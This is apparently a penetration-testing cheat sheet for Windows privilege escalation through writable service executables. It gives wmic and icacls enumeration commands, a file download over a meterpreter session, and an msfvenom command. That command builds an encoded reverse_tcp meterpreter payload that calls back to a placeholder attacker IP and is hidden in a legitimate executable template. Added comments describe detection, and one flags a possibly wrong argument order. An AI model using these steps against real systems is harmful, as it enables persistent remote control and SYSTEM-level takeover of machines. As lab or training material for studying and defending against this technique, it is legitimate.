Identify a service that runs with administrative privileges and starts automatically at boot, then replace its executable. The binary has to be in a path where we have write privileges.
# Service reconnaissance on the target host, run from the existing session.
# Defensive note: the weakness these steps look for is a service image path
# (or its parent directory) that a low-privileged account can write to.
# Auditing service binary ACLs and alerting on changes to service executables
# closes this path; see the note on the last command for detection.
wmic service list brief # Brief overview of installed services
wmic service > serv_list.txt # Full service listing, saved to a file for offline review
meterpreter > download //<path_to>/serv_list.txt # Pull the listing back over the session; the path is a placeholder as written
# Inspecting the entire list can take ages, so filter on write privileges instead
icacls C:\\windows\\system32 # Shows the ACL of the system32 folder
# Services whose image path is outside system32 are written to a file for inspection
# (presumably because system32 is not expected to be writable by a standard user - verify with icacls as above)
wmic service WHERE "NOT PathName LIKE '%system32%'" GET PathName, Name > C:\\Users\\els\\filt_serv.txt
# Download the above file and check each listed path for write privileges
# Builds a replacement binary from an existing executable template.
# NOTE(review): as written, the encoder name follows "-f exe" without an option
# flag - verify the argument order against the tool's usage text.
# Detection: the resulting file no longer matches the original's hash or
# Authenticode signature, so file-integrity monitoring and signature checks on
# service binaries (plus alerts on service image-path changes) surface this.
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<attacker_ip> LPORT=<attacker_port> -f exe x86/shikata_ga_nai -i 15 -k -x <binary>.exe > <output_binary>.exe